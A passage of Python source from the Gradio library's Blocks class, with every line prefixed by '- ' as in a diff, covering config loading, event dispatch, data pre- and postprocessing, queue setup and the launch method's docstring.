- fns: a list of functions that are used in the Blocks. Must be in the same order as the dependencies in the config.
- root_url: an external url to use as a root URL when serving files for components in the Blocks.
- """
- config = copy.deepcopy(config)
- components_config = config["components"]
- for component_config in components_config:
- # for backwards compatibility, extract style into props
- if "style" in component_config["props"]:
- component_config["props"].update(component_config["props"]["style"])
- del component_config["props"]["style"]
- theme = config.get("theme", "default")
- original_mapping: dict[int, Block] = {}
- root_urls = {root_url}
-
- def get_block_instance(id: int) -> Block:
- for block_config in components_config:
- if block_config["id"] == id:
- break
- else:
- raise ValueError(f"Cannot find block with id {id}")
- cls = component_or_layout_class(block_config["type"])
- block_config["props"].pop("type", None)
- block_config["props"].pop("name", None)
- # If a Gradio app B is loaded into a Gradio app A, and B itself loads a
- # Gradio app C, then the root_urls of the components in A need to be the
- # URL of C, not B. The else clause below handles this case.
- if block_config["props"].get("root_url") is None:
- block_config["props"]["root_url"] = f"{root_url}/"
- else:
- root_urls.add(block_config["props"]["root_url"])
- # Any component has already processed its initial value, so we skip that step here
- block = cls(**block_config["props"], _skip_init_processing=True)
- return block
-
- def iterate_over_children(children_list):
- for child_config in children_list:
- id = child_config["id"]
- block = get_block_instance(id)
-
- original_mapping[id] = block
-
- children = child_config.get("children")
- if children is not None:
- assert isinstance(
- block, BlockContext
- ), f"Invalid config, Block with id {id} has children but is not a BlockContext."
- with block:
- iterate_over_children(children)
-
- derived_fields = ["types"]
-
- with Blocks(theme=theme) as blocks:
- # ID 0 should be the root Blocks component
- original_mapping[0] = Context.root_block or blocks
-
- iterate_over_children(config["layout"]["children"])
-
- first_dependency = None
-
- # add the event triggers
- for dependency, fn in zip(config["dependencies"], fns):
- # We used to add a "fake_event" to the config to cache examples
- # without removing it. This was causing bugs in calling gr.load
- # We fixed the issue by removing "fake_event" from the config in examples.py
- # but we still need to skip these events when loading the config to support
- # older demos
- if dependency["trigger"] == "fake_event":
- continue
- for field in derived_fields:
- dependency.pop(field, None)
- targets = dependency.pop("targets")
- trigger = dependency.pop("trigger")
- dependency.pop("backend_fn")
- dependency.pop("documentation", None)
- dependency["inputs"] = [
- original_mapping[i] for i in dependency["inputs"]
- ]
- dependency["outputs"] = [
- original_mapping[o] for o in dependency["outputs"]
- ]
- dependency.pop("status_tracker", None)
- dependency["preprocess"] = False
- dependency["postprocess"] = False
-
- for target in targets:
- dependency = original_mapping[target].set_event_trigger(
- event_name=trigger, fn=fn, **dependency
- )[0]
- if first_dependency is None:
- first_dependency = dependency
-
- # Allows some use of Interface-specific methods with loaded Spaces
- if first_dependency and Context.root_block:
- blocks.predict = [fns[0]]
- blocks.input_components = [
- Context.root_block.blocks[i] for i in first_dependency["inputs"]
- ]
- blocks.output_components = [
- Context.root_block.blocks[o] for o in first_dependency["outputs"]
- ]
- blocks.__name__ = "Interface"
- blocks.api_mode = True
-
- blocks.root_urls = root_urls
- return blocks
-
- def __str__(self):
- return self.__repr__()
-
- def __repr__(self):
- num_backend_fns = len([d for d in self.dependencies if d["backend_fn"]])
- repr = f"Gradio Blocks instance: {num_backend_fns} backend functions"
- repr += f"\n{'-' * len(repr)}"
- for d, dependency in enumerate(self.dependencies):
- if dependency["backend_fn"]:
- repr += f"\nfn_index={d}"
- repr += "\n inputs:"
- for input_id in dependency["inputs"]:
- block = self.blocks[input_id]
- repr += f"\n |-{block}"
- repr += "\n outputs:"
- for output_id in dependency["outputs"]:
- block = self.blocks[output_id]
- repr += f"\n |-{block}"
- return repr
-
- def render(self):
- if Context.root_block is not None:
- if self._id in Context.root_block.blocks:
- raise DuplicateBlockError(
- f"A block with id: {self._id} has already been rendered in the current Blocks."
- )
- overlapping_ids = set(Context.root_block.blocks).intersection(self.blocks)
- for id in overlapping_ids:
- # State components are allowed to be reused between Blocks
- if not isinstance(self.blocks[id], components.State):
- raise DuplicateBlockError(
- "At least one block in this Blocks has already been rendered."
- )
-
- Context.root_block.blocks.update(self.blocks)
- Context.root_block.fns.extend(self.fns)
- dependency_offset = len(Context.root_block.dependencies)
- for i, dependency in enumerate(self.dependencies):
- api_name = dependency["api_name"]
- if api_name is not None and api_name is not False:
- api_name_ = utils.append_unique_suffix(
- api_name,
- [dep["api_name"] for dep in Context.root_block.dependencies],
- )
- if api_name != api_name_:
- warnings.warn(
- f"api_name {api_name} already exists, using {api_name_}"
- )
- dependency["api_name"] = api_name_
- dependency["cancels"] = [
- c + dependency_offset for c in dependency["cancels"]
- ]
- if dependency.get("trigger_after") is not None:
- dependency["trigger_after"] += dependency_offset
- # Recreate the cancel function so that it has the latest
- # dependency fn indices. This is necessary to properly cancel
- # events in the backend
- if dependency["cancels"]:
- updated_cancels = [
- Context.root_block.dependencies[i]
- for i in dependency["cancels"]
- ]
- new_fn = BlockFunction(
- get_cancel_function(updated_cancels)[0],
- [],
- [],
- False,
- True,
- False,
- )
- Context.root_block.fns[dependency_offset + i] = new_fn
- Context.root_block.dependencies.append(dependency)
- Context.root_block.temp_file_sets.extend(self.temp_file_sets)
- Context.root_block.root_urls.update(self.root_urls)
-
- if Context.block is not None:
- Context.block.children.extend(self.children)
- return self
-
- def is_callable(self, fn_index: int = 0) -> bool:
- """Checks if a particular Blocks function is callable (i.e. not stateful or a generator)."""
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
-
- if inspect.isasyncgenfunction(block_fn.fn):
- return False
- if inspect.isgeneratorfunction(block_fn.fn):
- return False
- for input_id in dependency["inputs"]:
- block = self.blocks[input_id]
- if getattr(block, "stateful", False):
- return False
- for output_id in dependency["outputs"]:
- block = self.blocks[output_id]
- if getattr(block, "stateful", False):
- return False
-
- return True
-
- def __call__(self, *inputs, fn_index: int = 0, api_name: str | None = None):
- """
- Allows Blocks objects to be called as functions. Supply the parameters to the
- function as positional arguments. To choose which function to call, use the
- fn_index parameter, which must be a keyword argument.
-
- Parameters:
- *inputs: the parameters to pass to the function
- fn_index: the index of the function to call (defaults to 0, which for Interfaces, is the default prediction function)
- api_name: The api_name of the dependency to call. Will take precedence over fn_index.
- """
- if api_name is not None:
- inferred_fn_index = next(
- (
- i
- for i, d in enumerate(self.dependencies)
- if d.get("api_name") == api_name
- ),
- None,
- )
- if inferred_fn_index is None:
- raise InvalidApiNameError(
- f"Cannot find a function with api_name {api_name}"
- )
- fn_index = inferred_fn_index
- if not (self.is_callable(fn_index)):
- raise ValueError(
- "This function is not callable because it is either stateful or is a generator. Please use the .launch() method instead to create an interactive user interface."
- )
-
- inputs = list(inputs)
- processed_inputs = self.serialize_data(fn_index, inputs)
- batch = self.dependencies[fn_index]["batch"]
- if batch:
- processed_inputs = [[inp] for inp in processed_inputs]
-
- outputs = client_utils.synchronize_async(
- self.process_api,
- fn_index=fn_index,
- inputs=processed_inputs,
- request=None,
- state={},
- )
- outputs = outputs["data"]
-
- if batch:
- outputs = [out[0] for out in outputs]
-
- processed_outputs = self.deserialize_data(fn_index, outputs)
- processed_outputs = utils.resolve_singleton(processed_outputs)
-
- return processed_outputs
-
- async def call_function(
- self,
- fn_index: int,
- processed_input: list[Any],
- iterator: AsyncIterator[Any] | None = None,
- requests: routes.Request | list[routes.Request] | None = None,
- event_id: str | None = None,
- event_data: EventData | None = None,
- ):
- """
- Calls function with given index and preprocessed input, and measures process time.
- Parameters:
- fn_index: index of function to call
- processed_input: preprocessed input to pass to function
- iterator: iterator to use if function is a generator
- requests: requests to pass to function
- event_id: id of event in queue
- event_data: data associated with event trigger
- """
- block_fn = self.fns[fn_index]
- assert block_fn.fn, f"function with index {fn_index} not defined."
- is_generating = False
-
- if block_fn.inputs_as_dict:
- processed_input = [dict(zip(block_fn.inputs, processed_input))]
-
- request = requests[0] if isinstance(requests, list) else requests
- processed_input, progress_index, _ = special_args(
- block_fn.fn, processed_input, request, event_data
- )
- progress_tracker = (
- processed_input[progress_index] if progress_index is not None else None
- )
-
- start = time.time()
-
- fn = utils.get_function_with_locals(block_fn.fn, self, event_id)
-
- if iterator is None: # If not a generator function that has already run
- if progress_tracker is not None and progress_index is not None:
- progress_tracker, fn = create_tracker(
- self, event_id, fn, progress_tracker.track_tqdm
- )
- processed_input[progress_index] = progress_tracker
-
- if inspect.iscoroutinefunction(fn):
- prediction = await fn(*processed_input)
- else:
- prediction = await anyio.to_thread.run_sync(
- fn, *processed_input, limiter=self.limiter
- )
- else:
- prediction = None
-
- if inspect.isgeneratorfunction(fn) or inspect.isasyncgenfunction(fn):
- if not self.enable_queue:
- raise ValueError("Need to enable queue to use generators.")
- try:
- if iterator is None:
- iterator = cast(AsyncIterator[Any], prediction)
- if inspect.isgenerator(iterator):
- iterator = utils.SyncToAsyncIterator(iterator, self.limiter)
- prediction = await utils.async_iteration(iterator)
- is_generating = True
- except StopAsyncIteration:
- n_outputs = len(self.dependencies[fn_index].get("outputs"))
- prediction = (
- components._Keywords.FINISHED_ITERATING
- if n_outputs == 1
- else (components._Keywords.FINISHED_ITERATING,) * n_outputs
- )
- iterator = None
-
- duration = time.time() - start
-
- return {
- "prediction": prediction,
- "duration": duration,
- "is_generating": is_generating,
- "iterator": iterator,
- }
-
- def serialize_data(self, fn_index: int, inputs: list[Any]) -> list[Any]:
- dependency = self.dependencies[fn_index]
- processed_input = []
-
- for i, input_id in enumerate(dependency["inputs"]):
- try:
- block = self.blocks[input_id]
- except KeyError as e:
- raise InvalidBlockError(
- f"Input component with id {input_id} used in {dependency['trigger']}() event is not defined in this gr.Blocks context. You are allowed to nest gr.Blocks contexts, but there must be a gr.Blocks context that contains all components and events."
- ) from e
- assert isinstance(
- block, components.IOComponent
- ), f"{block.__class__} Component with id {input_id} not a valid input component."
- serialized_input = block.serialize(inputs[i])
- processed_input.append(serialized_input)
-
- return processed_input
-
- def deserialize_data(self, fn_index: int, outputs: list[Any]) -> list[Any]:
- dependency = self.dependencies[fn_index]
- predictions = []
-
- for o, output_id in enumerate(dependency["outputs"]):
- try:
- block = self.blocks[output_id]
- except KeyError as e:
- raise InvalidBlockError(
- f"Output component with id {output_id} used in {dependency['trigger']}() event not found in this gr.Blocks context. You are allowed to nest gr.Blocks contexts, but there must be a gr.Blocks context that contains all components and events."
- ) from e
- assert isinstance(
- block, components.IOComponent
- ), f"{block.__class__} Component with id {output_id} not a valid output component."
- deserialized = block.deserialize(
- outputs[o],
- save_dir=block.DEFAULT_TEMP_DIR,
- root_url=block.root_url,
- hf_token=Context.hf_token,
- )
- predictions.append(deserialized)
-
- return predictions
-
- def validate_inputs(self, fn_index: int, inputs: list[Any]):
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
-
- dep_inputs = dependency["inputs"]
-
- # This handles incorrect inputs when args are changed by a JS function
- # Only check not enough args case, ignore extra arguments (for now)
- # TODO: make this stricter?
- if len(inputs) < len(dep_inputs):
- name = (
- f" ({block_fn.name})"
- if block_fn.name and block_fn.name != ""
- else ""
- )
-
- wanted_args = []
- received_args = []
- for input_id in dep_inputs:
- block = self.blocks[input_id]
- wanted_args.append(str(block))
- for inp in inputs:
- v = f'"{inp}"' if isinstance(inp, str) else str(inp)
- received_args.append(v)
-
- wanted = ", ".join(wanted_args)
- received = ", ".join(received_args)
-
- # JS func didn't pass enough arguments
- raise ValueError(
- f"""An event handler{name} didn't receive enough input values (needed: {len(dep_inputs)}, got: {len(inputs)}).
-Check if the event handler calls a Javascript function, and make sure its return value is correct.
-Wanted inputs:
- [{wanted}]
-Received inputs:
- [{received}]"""
- )
-
- def preprocess_data(self, fn_index: int, inputs: list[Any], state: dict[int, Any]):
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
-
- self.validate_inputs(fn_index, inputs)
-
- if block_fn.preprocess:
- processed_input = []
- for i, input_id in enumerate(dependency["inputs"]):
- try:
- block = self.blocks[input_id]
- except KeyError as e:
- raise InvalidBlockError(
- f"Input component with id {input_id} used in {dependency['trigger']}() event not found in this gr.Blocks context. You are allowed to nest gr.Blocks contexts, but there must be a gr.Blocks context that contains all components and events."
- ) from e
- assert isinstance(
- block, components.Component
- ), f"{block.__class__} Component with id {input_id} not a valid input component."
- if getattr(block, "stateful", False):
- processed_input.append(state.get(input_id))
- else:
- processed_input.append(block.preprocess(inputs[i]))
- else:
- processed_input = inputs
- return processed_input
-
- def validate_outputs(self, fn_index: int, predictions: Any | list[Any]):
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
-
- dep_outputs = dependency["outputs"]
-
- if type(predictions) is not list and type(predictions) is not tuple:
- predictions = [predictions]
-
- if len(predictions) < len(dep_outputs):
- name = (
- f" ({block_fn.name})"
- if block_fn.name and block_fn.name != ""
- else ""
- )
-
- wanted_args = []
- received_args = []
- for output_id in dep_outputs:
- block = self.blocks[output_id]
- wanted_args.append(str(block))
- for pred in predictions:
- v = f'"{pred}"' if isinstance(pred, str) else str(pred)
- received_args.append(v)
-
- wanted = ", ".join(wanted_args)
- received = ", ".join(received_args)
-
- raise ValueError(
- f"""An event handler{name} didn't receive enough output values (needed: {len(dep_outputs)}, received: {len(predictions)}).
-Wanted outputs:
- [{wanted}]
-Received outputs:
- [{received}]"""
- )
-
- def postprocess_data(
- self, fn_index: int, predictions: list | dict, state: dict[int, Any]
- ):
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
- batch = dependency["batch"]
-
- if type(predictions) is dict and len(predictions) > 0:
- predictions = convert_component_dict_to_list(
- dependency["outputs"], predictions
- )
-
- if len(dependency["outputs"]) == 1 and not (batch):
- predictions = [
- predictions,
- ]
-
- self.validate_outputs(fn_index, predictions) # type: ignore
-
- output = []
- for i, output_id in enumerate(dependency["outputs"]):
- try:
- if predictions[i] is components._Keywords.FINISHED_ITERATING:
- output.append(None)
- continue
- except (IndexError, KeyError) as err:
- raise ValueError(
- "Number of output components does not match number "
- f"of values returned from from function {block_fn.name}"
- ) from err
-
- try:
- block = self.blocks[output_id]
- except KeyError as e:
- raise InvalidBlockError(
- f"Output component with id {output_id} used in {dependency['trigger']}() event not found in this gr.Blocks context. You are allowed to nest gr.Blocks contexts, but there must be a gr.Blocks context that contains all components and events."
- ) from e
-
- if getattr(block, "stateful", False):
- if not utils.is_update(predictions[i]):
- state[output_id] = predictions[i]
- output.append(None)
- else:
- prediction_value = predictions[i]
- if utils.is_update(prediction_value):
- assert isinstance(prediction_value, dict)
- prediction_value = postprocess_update_dict(
- block=block,
- update_dict=prediction_value,
- postprocess=block_fn.postprocess,
- )
- elif block_fn.postprocess:
- assert isinstance(
- block, components.Component
- ), f"{block.__class__} Component with id {output_id} not a valid output component."
- prediction_value = block.postprocess(prediction_value)
- output.append(prediction_value)
-
- return output
-
- async def process_api(
- self,
- fn_index: int,
- inputs: list[Any],
- state: dict[int, Any],
- request: routes.Request | list[routes.Request] | None = None,
- iterators: dict[int, Any] | None = None,
- event_id: str | None = None,
- event_data: EventData | None = None,
- ) -> dict[str, Any]:
- """
- Processes API calls from the frontend. First preprocesses the data,
- then runs the relevant function, then postprocesses the output.
- Parameters:
- fn_index: Index of function to run.
- inputs: input data received from the frontend
- state: data stored from stateful components for session (key is input block id)
- request: the gr.Request object containing information about the network request (e.g. IP address, headers, query parameters, username)
- iterators: the in-progress iterators for each generator function (key is function index)
- event_id: id of event that triggered this API call
- event_data: data associated with the event trigger itself
- Returns: None
- """
- block_fn = self.fns[fn_index]
- batch = self.dependencies[fn_index]["batch"]
-
- if batch:
- max_batch_size = self.dependencies[fn_index]["max_batch_size"]
- batch_sizes = [len(inp) for inp in inputs]
- batch_size = batch_sizes[0]
- if inspect.isasyncgenfunction(block_fn.fn) or inspect.isgeneratorfunction(
- block_fn.fn
- ):
- raise ValueError("Gradio does not support generators in batch mode.")
- if not all(x == batch_size for x in batch_sizes):
- raise ValueError(
- f"All inputs to a batch function must have the same length but instead have sizes: {batch_sizes}."
- )
- if batch_size > max_batch_size:
- raise ValueError(
- f"Batch size ({batch_size}) exceeds the max_batch_size for this function ({max_batch_size})"
- )
-
- inputs = [
- self.preprocess_data(fn_index, list(i), state) for i in zip(*inputs)
- ]
- result = await self.call_function(
- fn_index, list(zip(*inputs)), None, request, event_id, event_data
- )
- preds = result["prediction"]
- data = [
- self.postprocess_data(fn_index, list(o), state) for o in zip(*preds)
- ]
- data = list(zip(*data))
- is_generating, iterator = None, None
- else:
- inputs = self.preprocess_data(fn_index, inputs, state)
- iterator = iterators.get(fn_index, None) if iterators else None
- result = await self.call_function(
- fn_index, inputs, iterator, request, event_id, event_data
- )
- data = self.postprocess_data(fn_index, result["prediction"], state)
- is_generating, iterator = result["is_generating"], result["iterator"]
-
- block_fn.total_runtime += result["duration"]
- block_fn.total_runs += 1
- return {
- "data": data,
- "is_generating": is_generating,
- "iterator": iterator,
- "duration": result["duration"],
- "average_duration": block_fn.total_runtime / block_fn.total_runs,
- }
-
- async def create_limiter(self):
- self.limiter = (
- None
- if self.max_threads == 40
- else CapacityLimiter(total_tokens=self.max_threads)
- )
-
- def get_config(self):
- return {"type": "column"}
-
- def get_config_file(self):
- config = {
- "version": routes.VERSION,
- "mode": self.mode,
- "dev_mode": self.dev_mode,
- "analytics_enabled": self.analytics_enabled,
- "components": [],
- "css": self.css,
- "title": self.title or "Gradio",
- "space_id": self.space_id,
- "enable_queue": getattr(self, "enable_queue", False), # launch attributes
- "show_error": getattr(self, "show_error", False),
- "show_api": self.show_api,
- "is_colab": utils.colab_check(),
- "stylesheets": self.stylesheets,
- "theme": self.theme.name,
- }
-
- def get_layout(block):
- if not isinstance(block, BlockContext):
- return {"id": block._id}
- children_layout = []
- for child in block.children:
- children_layout.append(get_layout(child))
- return {"id": block._id, "children": children_layout}
-
- config["layout"] = get_layout(self)
-
- for _id, block in self.blocks.items():
- props = block.get_config() if hasattr(block, "get_config") else {}
- block_config = {
- "id": _id,
- "type": block.get_block_name(),
- "props": utils.delete_none(props),
- }
- serializer = utils.get_serializer_name(block)
- if serializer:
- assert isinstance(block, serializing.Serializable)
- block_config["serializer"] = serializer
- block_config["api_info"] = block.api_info() # type: ignore
- block_config["example_inputs"] = block.example_inputs() # type: ignore
- config["components"].append(block_config)
- config["dependencies"] = self.dependencies
- return config
-
- def __enter__(self):
- if Context.block is None:
- Context.root_block = self
- self.parent = Context.block
- Context.block = self
- self.exited = False
- return self
-
- def __exit__(self, *args):
- super().fill_expected_parents()
- Context.block = self.parent
- # Configure the load events before root_block is reset
- self.attach_load_events()
- if self.parent is None:
- Context.root_block = None
- else:
- self.parent.children.extend(self.children)
- self.config = self.get_config_file()
- self.app = routes.App.create_app(self)
- self.progress_tracking = any(block_fn.tracks_progress for block_fn in self.fns)
- self.exited = True
-
- @class_or_instancemethod
- def load(
- self_or_cls, # noqa: N805
- fn: Callable | None = None,
- inputs: list[Component] | None = None,
- outputs: list[Component] | None = None,
- api_name: str | None | Literal[False] = None,
- scroll_to_output: bool = False,
- show_progress: str = "full",
- queue=None,
- batch: bool = False,
- max_batch_size: int = 4,
- preprocess: bool = True,
- postprocess: bool = True,
- every: float | None = None,
- _js: str | None = None,
- *,
- name: str | None = None,
- src: str | None = None,
- api_key: str | None = None,
- alias: str | None = None,
- **kwargs,
- ) -> Blocks | dict[str, Any] | None:
- """
- For reverse compatibility reasons, this is both a class method and an instance
- method, the two of which, confusingly, do two completely different things.
-
-
- Class method: loads a demo from a Hugging Face Spaces repo and creates it locally and returns a block instance. Warning: this method will be deprecated. Use the equivalent `gradio.load()` instead.
-
-
- Instance method: adds event that runs as soon as the demo loads in the browser. Example usage below.
- Parameters:
- name: Class Method - the name of the model (e.g. "gpt2" or "facebook/bart-base") or space (e.g. "flax-community/spanish-gpt2"), can include the `src` as prefix (e.g. "models/facebook/bart-base")
- src: Class Method - the source of the model: `models` or `spaces` (or leave empty if source is provided as a prefix in `name`)
- api_key: Class Method - optional access token for loading private Hugging Face Hub models or spaces. Find your token here: https://huggingface.co/settings/tokens. Warning: only provide this if you are loading a trusted private Space as it can be read by the Space you are loading.
- alias: Class Method - optional string used as the name of the loaded model instead of the default name (only applies if loading a Space running Gradio 2.x)
- fn: Instance Method - the function to wrap an interface around. Often a machine learning model's prediction function. Each parameter of the function corresponds to one input component, and the function should return a single value or a tuple of values, with each element in the tuple corresponding to one output component.
- inputs: Instance Method - List of gradio.components to use as inputs. If the function takes no inputs, this should be an empty list.
- outputs: Instance Method - List of gradio.components to use as inputs. If the function returns no outputs, this should be an empty list.
- api_name: Instance Method - Defines how the endpoint appears in the API docs. Can be a string, None, or False. If False, the endpoint will not be exposed in the api docs. If set to None, the endpoint will be exposed in the api docs as an unnamed endpoint, although this behavior will be changed in Gradio 4.0. If set to a string, the endpoint will be exposed in the api docs with the given name.
- scroll_to_output: Instance Method - If True, will scroll to output component on completion
- show_progress: Instance Method - If True, will show progress animation while pending
- queue: Instance Method - If True, will place the request on the queue, if the queue exists
- batch: Instance Method - If True, then the function should process a batch of inputs, meaning that it should accept a list of input values for each parameter. The lists should be of equal length (and be up to length `max_batch_size`). The function is then *required* to return a tuple of lists (even if there is only 1 output component), with each list in the tuple corresponding to one output component.
- max_batch_size: Instance Method - Maximum number of inputs to batch together if this is called from the queue (only relevant if batch=True)
- preprocess: Instance Method - If False, will not run preprocessing of component data before running 'fn' (e.g. leaving it as a base64 string if this method is called with the `Image` component).
- postprocess: Instance Method - If False, will not run postprocessing of component data before returning 'fn' output to the browser.
- every: Instance Method - Run this event 'every' number of seconds. Interpreted in seconds. Queue must be enabled.
- Example:
- import gradio as gr
- import datetime
- with gr.Blocks() as demo:
- def get_time():
- return datetime.datetime.now().time()
- dt = gr.Textbox(label="Current time")
- demo.load(get_time, inputs=None, outputs=dt)
- demo.launch()
- """
- if isinstance(self_or_cls, type):
- warn_deprecation(
- "gr.Blocks.load() will be deprecated. Use gr.load() instead."
- )
- if name is None:
- raise ValueError(
- "Blocks.load() requires passing parameters as keyword arguments"
- )
- return external.load(
- name=name, src=src, hf_token=api_key, alias=alias, **kwargs
- )
- else:
- from gradio.events import Dependency
-
- dep, dep_index = self_or_cls.set_event_trigger(
- event_name="load",
- fn=fn,
- inputs=inputs,
- outputs=outputs,
- api_name=api_name,
- preprocess=preprocess,
- postprocess=postprocess,
- scroll_to_output=scroll_to_output,
- show_progress=show_progress,
- js=_js,
- queue=queue,
- batch=batch,
- max_batch_size=max_batch_size,
- every=every,
- no_target=True,
- )
- return Dependency(self_or_cls, dep, dep_index)
-
- def clear(self):
- """Resets the layout of the Blocks object."""
- self.blocks = {}
- self.fns = []
- self.dependencies = []
- self.children = []
- return self
-
- @document()
- def queue(
- self,
- concurrency_count: int = 1,
- status_update_rate: float | Literal["auto"] = "auto",
- client_position_to_load_data: int | None = None,
- default_enabled: bool | None = None,
- api_open: bool = True,
- max_size: int | None = None,
- ):
- """
- You can control the rate of processed requests by creating a queue. This will allow you to set the number of requests to be processed at one time, and will let users know their position in the queue.
- Parameters:
- concurrency_count: Number of worker threads that will be processing requests from the queue concurrently. Increasing this number will increase the rate at which requests are processed, but will also increase the memory usage of the queue.
- status_update_rate: If "auto", Queue will send status estimations to all clients whenever a job is finished. Otherwise Queue will send status at regular intervals set by this parameter as the number of seconds.
- client_position_to_load_data: DEPRECATED. This parameter is deprecated and has no effect.
- default_enabled: Deprecated and has no effect.
- api_open: If True, the REST routes of the backend will be open, allowing requests made directly to those endpoints to skip the queue.
- max_size: The maximum number of events the queue will store at any given moment. If the queue is full, new events will not be added and a user will receive a message saying that the queue is full. If None, the queue size will be unlimited.
- Example: (Blocks)
- with gr.Blocks() as demo:
- button = gr.Button(label="Generate Image")
- button.click(fn=image_generator, inputs=gr.Textbox(), outputs=gr.Image())
- demo.queue(concurrency_count=3)
- demo.launch()
- Example: (Interface)
- demo = gr.Interface(image_generator, gr.Textbox(), gr.Image())
- demo.queue(concurrency_count=3)
- demo.launch()
- """
- if default_enabled is not None:
- warn_deprecation(
- "The default_enabled parameter of queue has no effect and will be removed "
- "in a future version of gradio."
- )
- self.enable_queue = True
- self.api_open = api_open
- if client_position_to_load_data is not None:
- warn_deprecation(
- "The client_position_to_load_data parameter is deprecated."
- )
- max_size_default = self.max_threads if utils.is_zero_gpu_space() else None
- self._queue = queueing.Queue(
- live_updates=status_update_rate == "auto",
- concurrency_count=concurrency_count,
- update_intervals=status_update_rate if status_update_rate != "auto" else 1,
- max_size=max_size_default if max_size is None else max_size,
- blocks_dependencies=self.dependencies,
- )
- self.config = self.get_config_file()
- self.app = routes.App.create_app(self)
- return self
-
- def validate_queue_settings(self):
- if not self.enable_queue and self.progress_tracking:
- raise ValueError("Progress tracking requires queuing to be enabled.")
-
- for fn_index, dep in enumerate(self.dependencies):
- if not self.enable_queue and self.queue_enabled_for_fn(fn_index):
- raise ValueError(
- f"The queue is enabled for event {dep['api_name'] if dep['api_name'] else fn_index} "
- "but the queue has not been enabled for the app. Please call .queue() "
- "on your app. Consult https://gradio.app/docs/#blocks-queue for information on how "
- "to configure the queue."
- )
- for i in dep["cancels"]:
- if not self.queue_enabled_for_fn(i):
- raise ValueError(
- "Queue needs to be enabled! "
- "You may get this error by either 1) passing a function that uses the yield keyword "
- "into an interface without enabling the queue or 2) defining an event that cancels "
- "another event without enabling the queue. Both can be solved by calling .queue() "
- "before .launch()"
- )
- if dep["batch"] and (
- dep["queue"] is False
- or (dep["queue"] is None and not self.enable_queue)
- ):
- raise ValueError("In order to use batching, the queue must be enabled.")
-
- def launch(
- self,
- inline: bool | None = None,
- inbrowser: bool = False,
- share: bool | None = None,
- debug: bool = False,
- enable_queue: bool | None = None,
- max_threads: int = 40,
- auth: Callable | tuple[str, str] | list[tuple[str, str]] | None = None,
- auth_message: str | None = None,
- prevent_thread_lock: bool = False,
- show_error: bool = False,
- server_name: str | None = None,
- server_port: int | None = None,
- show_tips: bool = False,
- height: int = 500,
- width: int | str = "100%",
- encrypt: bool | None = None,
- favicon_path: str | None = None,
- ssl_keyfile: str | None = None,
- ssl_certfile: str | None = None,
- ssl_keyfile_password: str | None = None,
- ssl_verify: bool = True,
- quiet: bool = False,
- show_api: bool = True,
- file_directories: list[str] | None = None,
- allowed_paths: list[str] | None = None,
- blocked_paths: list[str] | None = None,
- root_path: str = "",
- _frontend: bool = True,
- app_kwargs: dict[str, Any] | None = None,
- ) -> tuple[FastAPI, str, str]:
- """
- Launches a simple web server that serves the demo. Can also be used to create a
- public link used by anyone to access the demo from their browser by setting share=True.
-
- Parameters:
- inline: whether to display in the interface inline in an iframe. Defaults to True in python notebooks; False otherwise.
- inbrowser: whether to automatically launch the interface in a new tab on the default browser.
- share: whether to create a publicly shareable link for the interface. Creates an SSH tunnel to make your UI accessible from anywhere. If not provided, it is set to False by default every time, except when running in Google Colab. When localhost is not accessible (e.g. Google Colab), setting share=False is not supported.
- debug: if True, blocks the main thread from running. If running in Google Colab, this is needed to print the errors in the cell output.
- auth: If provided, username and password (or list of username-password tuples) required to access interface. Can also provide function that takes username and password and returns True if valid login.
- auth_message: If provided, HTML message provided on login page.
- prevent_thread_lock: If True, the interface will block the main thread while the server is running.
- show_error: If True, any errors in the interface will be displayed in an alert modal and printed in the browser console log
- server_port: will start gradio app on this port (if available). Can be set by environment variable GRADIO_SERVER_PORT. If None, will search for an available port starting at 7860.
- server_name: to make app accessible on local network, set this to "0.0.0.0". Can be set by environment variable GRADIO_SERVER_NAME. If None, will use "127.0.0.1".
- show_tips: if True, will occasionally show tips about new Gradio features
- enable_queue: DEPRECATED (use .queue() method instead.) if True, inference requests will be served through a queue instead of with parallel threads. Required for longer inference times (> 1min) to prevent timeout. The default option in HuggingFace Spaces is True. The default option elsewhere is False.
- max_threads: the maximum number of total threads that the Gradio app can generate in parallel. The default is inherited from the starlette library (currently 40). Applies whether the queue is enabled or not. But if queuing is enabled, this parameter is increaseed to be at least the concurrency_count of the queue.
- width: The width in pixels of the iframe element containing the interface (used if inline=True)
- height: The height in pixels of the iframe element containing the interface (used if inline=True)
- encrypt: DEPRECATED. Has no effect.
- favicon_path: If a path to a file (.png, .gif, or .ico) is provided, it will be used as the favicon for the web page.
- ssl_keyfile: If a path to a file is provided, will use this as the private key file to create a local server running on https.
- ssl_certfile: If a path to a file is provided, will use this as the signed certificate for https. Needs to be provided if ssl_keyfile is provided.
- ssl_keyfile_password: If a password is provided, will use this with the ssl certificate for https.
- ssl_verify: If False, skips certificate validation which allows self-signed certificates to be used.
- quiet: If True, suppresses most print statements.
- show_api: If True, shows the api docs in the footer of the app. Default True. If the queue is enabled, then api_open parameter of .queue() will determine if the api docs are shown, independent of the value of show_api.
- file_directories: This parameter has been renamed to `allowed_paths`. It will be removed in a future version.
- allowed_paths: List of complete filepaths or parent directories that gradio is allowed to serve (in addition to the directory containing the gradio python file). Must be absolute paths. Warning: if you provide directories, any files in these directories or their subdirectories are accessible to all users of your app.
- blocked_paths: List of complete filepaths or parent directories that gradio is not allowed to serve (i.e. users of your app are not allowed to access). Must be absolute paths. Warning: takes precedence over `allowed_paths` and all other directories exposed by Gradio by default.
- root_path: The root path (or "mount point") of the application, if it's not served from the root ("/") of the domain. Often used when the application is behind a reverse proxy that forwards requests to the application. For example, if the application is served at "https://example.com/myapp", the `root_path` should be set to "/myapp".
- app_kwargs: Additional keyword arguments to pass to the underlying FastAPI app as a dictionary of parameter keys and argument values. For example, `{"docs_url": "/docs"}`
- Returns:
- app: FastAPI app object that is running the demo
- local_url: Locally accessible link to the demo
- share_url: Publicly accessible link to the demo (if share=True, otherwise None)
- Example: (Blocks)
- import gradio as gr
- def reverse(text):
- return text[::-1]
- with gr.Blocks() as demo:
- button = gr.Button(value="Reverse")
- button.click(reverse, gr.Textbox(), gr.Textbox())
- demo.launch(share=True, auth=("username", "password"))
- Example: (Interface)
- import gradio as gr
- def reverse(text):
- return text[::-1]
- demo = gr.Interface(reverse, "text", "text")
- demo.launch(share=True, auth=("username", "password"))
- """
